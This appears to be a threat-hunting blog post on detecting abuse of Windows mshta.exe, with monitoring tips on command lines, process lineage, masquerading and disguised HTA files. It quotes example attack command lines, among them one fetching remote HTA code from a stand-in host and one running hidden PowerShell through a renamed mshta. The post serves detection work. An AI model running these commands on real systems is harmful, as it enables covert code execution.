Post

mshta Hunt

Mshta is attractive to adversaries both in the early and latter stages of an infection because it enables them to proxy the execution of arbitrary code through a trusted utility.

Process and command-line monitoring

Monitor process execution and command-line parameters for suspicious use of Mshta

Look for Mshta being executed with command lines containing protocol handlers like javascript, vbscript, about, etc.

Example:

mshta vbscript:CreateObject("WScript.Shell").Run("notepad.exe")(window.close)

Collect parent-child process relationships and identify any suspicious process lineage patterns involving Mshta.

Example:

Parent process: winword.exe

Child process: mshta.exe

Monitor process metadata

Internal process name: mshta.exe Apparent filename: calc.exe

File monitoring and network connections

Monitor file activity for the presence of Mshta-related files, such as HTA files (ending with .hta extension). Look for Mshta executing remotely hosted HTA content via URIs or UNC paths. Command line: mshta http://example.com/malicious.hta

Suspicious process ancestry

For example, an adversary conducting a phishing attack might embed a macro in a Microsoft Word document that executes a malicious HTA file.

Parent process: winword.exe Child process: mshta.exe

Mshta masquerading

C:\Test\notepad.exe "javascript:a=new ActiveXObject("WScript.Shell");a.Run("powershell.

exe%20-nop%20-Command%20Write-Host%20f83a289e-8218-459c-9ddb-ccd3b72c732a;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close();"

Network connections and HTA content

File extension: .pdf MIME type: application/hta

False positive mitigation

Fine-tune detection logic to account for legitimate and expected use of Mshta in your environment.

Reference

https://redcanary.com/threat-detection-report/techniques/mshta/#:~:text=Suspicious%20process%20ancestry,executes%20a%20malicious%20HTA%20file

This post is licensed under CC BY 4.0 by the author.